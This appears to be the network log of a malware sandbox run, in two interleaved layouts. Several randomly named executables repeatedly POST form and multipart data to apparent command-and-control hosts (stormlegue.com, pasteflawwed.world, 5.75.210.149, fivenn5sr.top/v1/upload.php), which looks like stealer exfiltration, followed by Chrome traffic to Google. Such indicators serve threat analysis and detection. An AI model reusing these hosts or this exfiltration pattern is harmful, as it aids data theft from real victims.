                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uA2%2Bv8V%2FFMMrO0ry7YZ5zAga3N%2Bk0nyu4MBfP8QCmpNMmIk9vMNJBff%2FEERJ2xXXBksg6xrcb4DwNe4HhAB4QrSQF00gX2voBsk4t5FexsSEV8l5%2BiJHpz2nXr3l1pcLpg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a67de89ab7717-LHR
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              d2YQIJa.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=peB1EBdIVbmVTMJ5Of1cLFNX762_xKB5bk_I2d2eGk0-1740011611-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 43
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:32 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=1kphb8i98dd595ne9q209s0knv; expires=Fri, 21 Feb 2025 00:33:32 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H1dBXkeXcBlos4BgZB0xYyzm2tHGbCahepHwoTsgqMKdSylvChVPTMkAQXUEcJXTIlO7Df4An4UQetWWtq6TacyCypVug59t5dp7EaPyOqZOrXZHbpN8GJAhUwcE%2Fzzh0g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a67ded9de7717-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=42564&min_rtt=41679&rtt_var=4514&sent=13&recv=12&lost=0&retrans=0&sent_bytes=8838&recv_bytes=1053&delivery_rate=189852&cwnd=257&unsent_bytes=0&cid=01791c6ffa997ba8&ts=373&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              d2YQIJa.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=COHK5MYA0F2GF
                                                                                              Cookie: __cf_mw_byp=peB1EBdIVbmVTMJ5Of1cLFNX762_xKB5bk_I2d2eGk0-1740011611-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1582
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:32 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=vuohkh28lg54q9sm1ip9nq7n5k; expires=Fri, 21 Feb 2025 00:33:32 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EcGIO7sDAado64yPuJ%2BqdC9dgGA3ukJbdsbIFvE5cw1CJDoAVGPgqPTqGK1HD9UfG89pg7eedvxF901h5x1%2B3Yi11d8mgKDqm32kWGmH4XULxB7a5bnYoPgqKZUerkZX6g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a67e11b647717-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=42483&min_rtt=41679&rtt_var=3548&sent=17&recv=16&lost=0&retrans=0&sent_bytes=10005&recv_bytes=3056&delivery_rate=189852&cwnd=257&unsent_bytes=0&cid=01791c6ffa997ba8&ts=629&x=0"
• [US]
  POST https://stormlegue.com/api
  Process: d2YQIJa.exe
  Remote address: 104.21.16.1:443
  Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=31TW4FYQEUGRBWZ0V6O
    Cookie: __cf_mw_byp=peB1EBdIVbmVTMJ5Of1cLFNX762_xKB5bk_I2d2eGk0-1740011611-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1108
    Host: stormlegue.com
  Response
    HTTP/1.1 200 OK
    Date: Thu, 20 Feb 2025 00:33:32 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Set-Cookie: PHPSESSID=ri714fbdhki49h0536mfdehn5q; expires=Fri, 21 Feb 2025 00:33:32 GMT; Max-Age=86400; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2iYow7MJnu7cyhJ00Z3sHvPjzLmP0b8NVv72gKNNLHP%2F0HhyZVuiAHIwvY1MDFzM6HZ%2FfSFGokklVt63M71nsmkPYo%2Bu8hE%2BkalO7jnsiWbMn43Y1mUf4%2Fmo9lJvx%2BsWPg%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 914a67e35a203d94-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=41845&min_rtt=41423&rtt_var=9371&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3566&recv_bytes=1809&delivery_rate=94391&cwnd=253&unsent_bytes=0&cid=93386e466d677fd9&ts=277&x=0"
• [US]
  POST https://stormlegue.com/api
  Process: d2YQIJa.exe
  Remote address: 104.21.16.1:443
  Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Cookie: __cf_mw_byp=peB1EBdIVbmVTMJ5Of1cLFNX762_xKB5bk_I2d2eGk0-1740011611-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 77
    Host: stormlegue.com
  Response
    HTTP/1.1 200 OK
    Date: Thu, 20 Feb 2025 00:33:33 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Set-Cookie: PHPSESSID=58p4v78mhgq1s9jvmnh3g66ui8; expires=Fri, 21 Feb 2025 00:33:33 GMT; Max-Age=86400; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oSKZtk2iNL17Lfut4gcQ6wyu4mGNw%2BrZ%2BWwmVOLbnOxHXFSRFQK%2F8CXHM58pPxZf0flWW92j9dmK9oxRyfjaa%2FRO5mjB8A6rvzmUxC7GEySmjAv%2BymSn8nIyngI6L1XcSg%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 914a67e5aef70339-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=42700&min_rtt=41934&rtt_var=9986&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3565&recv_bytes=760&delivery_rate=93884&cwnd=253&unsent_bytes=0&cid=2f8b9493763dade3&ts=225&x=0"
• [US]
  DNS pasteflawwed.world
  Process: 6ccbdd7074.exe
  Remote address: 8.8.8.8:53
  Request
    pasteflawwed.world IN A
  Response
    pasteflawwed.world IN A 104.21.86.17
    pasteflawwed.world IN A 172.67.214.11
• [US]
  POST https://pasteflawwed.world/api
  Process: f3Ypd8O.exe
  Remote address: 104.21.86.17:443
  Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: pasteflawwed.world
  Response
    HTTP/1.1 403 Forbidden
    Date: Thu, 20 Feb 2025 00:33:34 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Frame-Options: SAMEORIGIN
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wFFqiD6jyLROHIaF%2FtwSlobpJK4Rj9HbKugFyu%2FE2EHJlMWVWauQClJaZwz5v6Q6EqwVMuDs74qO9qrOuAjkP6XzMTwgYCbNT3mT0YlsKX008hxHhjhz%2Fhw1aqVrmowHNtnScxI%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 914a67f00b4155ea-LHR
• [US]
  POST https://pasteflawwed.world/api
  Process: f3Ypd8O.exe
  Remote address: 104.21.86.17:443
  Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Cookie: __cf_mw_byp=vC1sdMeRyDGMJP1Wz9qaX7elzM4D2ESIdQSvDLIQjy4-1740011614-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 53
    Host: pasteflawwed.world
  Response
    HTTP/1.1 200 OK
    Date: Thu, 20 Feb 2025 00:33:34 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Set-Cookie: PHPSESSID=iiq9usq93p74ifkta8glsa6qor; expires=Fri, 21 Feb 2025 00:33:34 GMT; Max-Age=86400; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VElU6hL0znFqd%2BqP%2BVVEv3uNWEzcOTVZropRpKFx6GlyGIa6jlNebT1nvEN4kwqCxvXSr0lecSG9NLG7AK%2BxF6hRjPuR4nS%2FX0BFhJb9vaXJDTxAwpbRfAtXESRIpNL29Y1DZYc%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 914a67f07b7f55ea-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=44786&min_rtt=42340&rtt_var=5380&sent=14&recv=12&lost=0&retrans=0&sent_bytes=8572&recv_bytes=1075&delivery_rate=209155&cwnd=247&unsent_bytes=0&cid=c01a589d033ef9c2&ts=366&x=0"
• [US]
  POST https://pasteflawwed.world/api
  Process: f3Ypd8O.exe
  Remote address: 104.21.86.17:443
  Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=UWTM792M
    Cookie: __cf_mw_byp=vC1sdMeRyDGMJP1Wz9qaX7elzM4D2ESIdQSvDLIQjy4-1740011614-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1569
    Host: pasteflawwed.world
  Response
    HTTP/1.1 200 OK
    Date: Thu, 20 Feb 2025 00:33:35 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Set-Cookie: PHPSESSID=le3l7t0badbv807cs76mcfg6ub; expires=Fri, 21 Feb 2025 00:33:35 GMT; Max-Age=86400; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g9owDSgqeoZFAQW7JdvqKblYOPHVmLiSZW%2B0dnSRrf2xlGLHZNqPRE488BqJVqpQWs0eXMTp9fLmiDmUrh1tSNmi8puwh2vHDcS8ixzz3RGxDjxmrQmu1PCDEsGfXt6N6uWm4yk%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 914a67f22c9755ea-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=44500&min_rtt=42340&rtt_var=4607&sent=17&recv=16&lost=0&retrans=0&sent_bytes=9747&recv_bytes=3064&delivery_rate=209155&cwnd=247&unsent_bytes=0&cid=c01a589d033ef9c2&ts=591&x=0"
• [US]
  POST https://pasteflawwed.world/api
  Process: f3Ypd8O.exe
  Remote address: 104.21.86.17:443
  Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=NQH6CI0JVP5FLHS
    Cookie: __cf_mw_byp=vC1sdMeRyDGMJP1Wz9qaX7elzM4D2ESIdQSvDLIQjy4-1740011614-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1101
    Host: pasteflawwed.world
  Response
    HTTP/1.1 200 OK
    Date: Thu, 20 Feb 2025 00:33:35 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Set-Cookie: PHPSESSID=tbqickl1d1j81egqn0v19mbm6p; expires=Fri, 21 Feb 2025 00:33:35 GMT; Max-Age=86400; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nk1DoFqAR9hnEYK7g0kf%2BxHUcwPNvQ62YssSsuYwkCvVsCPhsUhBSD8%2FW52as7AnPPyAGfPCOCcV0g5gZfCJCw3BoFN%2Bx7lkzQVd3Xxzd63PNEAdunLOI%2Bt4eH3ApJBipvQ%2Fa9Y%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 914a67f46df455ea-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=42422&min_rtt=41688&rtt_var=9813&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3300&recv_bytes=1806&delivery_rate=89439&cwnd=243&unsent_bytes=0&cid=0805cbb10e724aed&ts=268&x=0"
• [US]
  POST https://pasteflawwed.world/api
  Process: f3Ypd8O.exe
  Remote address: 104.21.86.17:443
  Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Cookie: __cf_mw_byp=vC1sdMeRyDGMJP1Wz9qaX7elzM4D2ESIdQSvDLIQjy4-1740011614-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 87
    Host: pasteflawwed.world
  Response
    HTTP/1.1 200 OK
    Date: Thu, 20 Feb 2025 00:33:36 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Set-Cookie: PHPSESSID=slu019ou7p38m318p81ejg1l1r; expires=Fri, 21 Feb 2025 00:33:35 GMT; Max-Age=86400; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R%2B5NSCSZbn3DdxAc65V2AwfODsyfyOPqMlKJvaKEqWuFWym0nauVg6bxJI7gcEaHZFYA6gKORDeGw2n2b8PLoL5ByyCLPG8l0R4UUITKdRMfvBpQlvfNDpwFxQdyTD0%2FPFemMu4%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 914a67f6adef948a-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=42644&min_rtt=42392&rtt_var=9305&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3300&recv_bytes=778&delivery_rate=93275&cwnd=253&unsent_bytes=0&cid=ac6e00b93b4032ab&ts=316&x=0"
• [DE]
  GET https://5.75.210.149/
  Process: 7aencsM.exe
  Remote address: 5.75.210.149:443
  Request
    GET / HTTP/1.1
    Host: 5.75.210.149
    Connection: Keep-Alive
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 20 Feb 2025 00:33:39 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
                                                                                            • flag-de
                                                                                              POST
                                                                                              https://5.75.210.149/
                                                                                              7aencsM.exe
                                                                                              Remote address:
                                                                                              5.75.210.149:443
                                                                                              Request
                                                                                              POST / HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----aaie3ozmgv3ozusjwbsj
                                                                                              Host: 5.75.210.149
                                                                                              Content-Length: 256
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Thu, 20 Feb 2025 00:33:39 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-de
                                                                                              POST
                                                                                              https://5.75.210.149/
                                                                                              7aencsM.exe
                                                                                              Remote address:
                                                                                              5.75.210.149:443
                                                                                              Request
                                                                                              POST / HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----gv3w4e37ycbaaiw4ecjw
                                                                                              Host: 5.75.210.149
                                                                                              Content-Length: 331
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Thu, 20 Feb 2025 00:33:40 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-de
                                                                                              POST
                                                                                              https://5.75.210.149/
                                                                                              7aencsM.exe
                                                                                              Remote address:
                                                                                              5.75.210.149:443
                                                                                              Request
                                                                                              POST / HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----qqq168q16fusrimgln7q
                                                                                              Host: 5.75.210.149
                                                                                              Content-Length: 331
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Thu, 20 Feb 2025 00:33:40 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-de
                                                                                              POST
                                                                                              https://5.75.210.149/
                                                                                              7aencsM.exe
                                                                                              Remote address:
                                                                                              5.75.210.149:443
                                                                                              Request
                                                                                              POST / HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----2n79hdjwbsjmyu37gvkf
                                                                                              Host: 5.75.210.149
                                                                                              Content-Length: 332
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Thu, 20 Feb 2025 00:33:41 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-de
                                                                                              POST
                                                                                              https://5.75.210.149/
                                                                                              7aencsM.exe
                                                                                              Remote address:
                                                                                              5.75.210.149:443
                                                                                              Request
                                                                                              POST / HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----vaaaieusjwb1v3oh479r
                                                                                              Host: 5.75.210.149
                                                                                              Content-Length: 4725
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Thu, 20 Feb 2025 00:33:42 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-de
                                                                                              POST
                                                                                              https://5.75.210.149/
                                                                                              7aencsM.exe
                                                                                              Remote address:
                                                                                              5.75.210.149:443
                                                                                              Request
                                                                                              POST / HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----vs0h4ohdtjwbaa1d2dtr
                                                                                              Host: 5.75.210.149
                                                                                              Content-Length: 331
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Thu, 20 Feb 2025 00:33:42 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-de
                                                                                              POST
                                                                                              https://5.75.210.149/
                                                                                              7aencsM.exe
                                                                                              Remote address:
                                                                                              5.75.210.149:443
                                                                                              Request
                                                                                              POST / HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----mgl6fct2db16f3ozct2n
                                                                                              Host: 5.75.210.149
                                                                                              Content-Length: 489
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Thu, 20 Feb 2025 00:33:43 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-us
                                                                                              DNS
                                                                                              fivenn5sr.top
                                                                                              90ced29b15.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              fivenn5sr.top
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              fivenn5sr.top
                                                                                              90ced29b15.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              fivenn5sr.top
                                                                                              IN AAAA
                                                                                              Response
                                                                                              fivenn5sr.top
                                                                                              IN A
                                                                                              185.72.145.179
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://fivenn5sr.top/v1/upload.php
                                                                                              90ced29b15.exe
                                                                                              Remote address:
                                                                                              185.72.145.179:80
                                                                                              Request
                                                                                              POST /v1/upload.php HTTP/1.1
                                                                                              Host: fivenn5sr.top
                                                                                              Accept: */*
                                                                                              Content-Length: 465
                                                                                              Content-Type: multipart/form-data; boundary=------------------------CPWDGhif653HBLjAc7LLLQ
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              server: nginx
                                                                                              date: Thu, 20 Feb 2025 00:33:44 GMT
                                                                                              content-type: text/plain; charset=utf-8
                                                                                              content-length: 2
                                                                                              x-ratelimit-limit: 30
                                                                                              x-ratelimit-remaining: 29
                                                                                              x-ratelimit-reset: 1740013425
                                                                                              etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                            • flag-us
                                                                                              DNS
                                                                                              clients2.google.com
                                                                                              chrome.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              clients2.google.com
                                                                                              IN A
                                                                                              Response
                                                                                              clients2.google.com
                                                                                              IN CNAME
                                                                                              clients.l.google.com
                                                                                              clients.l.google.com
                                                                                              IN A
                                                                                              172.217.169.78
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.86.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D2%2526e%253D1
                                                                                              chrome.exe
                                                                                              Remote address:
                                                                                              172.217.169.78:443
                                                                                              Request
                                                                                              GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.86.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D2%2526e%253D1 HTTP/2.0
                                                                                              host: clients2.google.com
                                                                                              sec-fetch-site: none
                                                                                              sec-fetch-mode: no-cors
                                                                                              sec-fetch-dest: empty
                                                                                              user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                                                                              accept-encoding: gzip, deflate, br, zstd
                                                                                              accept-language: en-US,en;q=0.9
                                                                                              cookie: __Secure-ENID=25.SE=FqFe7UrTzzFPR0IaYsuhGNML1XH-htbGRn0dSMEcfFldrc08ldcRazHN8GZGWbmVFuVsOI2vcDBF9bcc_zkaTICskZXh9eqH4jq9AxT6nwu8iCXpFh2hJ3dFuiu6dKmX4HiNm3rIQi1BdlPVu-RTP-qSptzztOtor9nxszvH3Mqsq9h-Kdr_rnlDqZ_aHUJki6Q-bZLaiBTm
                                                                                            • flag-us
                                                                                              DNS
                                                                                              www.google.com
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              www.google.com
                                                                                              IN A
                                                                                              Response
                                                                                              www.google.com
                                                                                              IN A
                                                                                              142.250.200.4
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://www.google.com/async/ddljson?async=ntp:2
                                                                                              chrome.exe
                                                                                              Remote address:
                                                                                              142.250.200.4:443
                                                                                              Request
                                                                                              GET /async/ddljson?async=ntp:2 HTTP/2.0
                                                                                              host: www.google.com
                                                                                              sec-fetch-site: none
                                                                                              sec-fetch-mode: no-cors
                                                                                              sec-fetch-dest: empty
                                                                                              user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                                                                              accept-encoding: gzip, deflate, br, zstd
                                                                                              accept-language: en-US,en;q=0.9
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                              chrome.exe
                                                                                              Remote address:
                                                                                              142.250.200.4:443
                                                                                              Request
                                                                                              GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/2.0
                                                                                              host: www.google.com
                                                                                              x-client-data: CNCIywE=
                                                                                              sec-fetch-site: cross-site
                                                                                              sec-fetch-mode: no-cors
                                                                                              sec-fetch-dest: empty
                                                                                              user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                                                                              accept-encoding: gzip, deflate, br, zstd
                                                                                              accept-language: en-US,en;q=0.9
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://www.google.com/async/newtab_promos
                                                                                              chrome.exe
                                                                                              Remote address:
                                                                                              142.250.200.4:443
                                                                                              Request
                                                                                              GET /async/newtab_promos HTTP/2.0
                                                                                              host: www.google.com
                                                                                              sec-fetch-site: cross-site
                                                                                              sec-fetch-mode: no-cors
                                                                                              sec-fetch-dest: empty
                                                                                              user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                                                                              accept-encoding: gzip, deflate, br, zstd
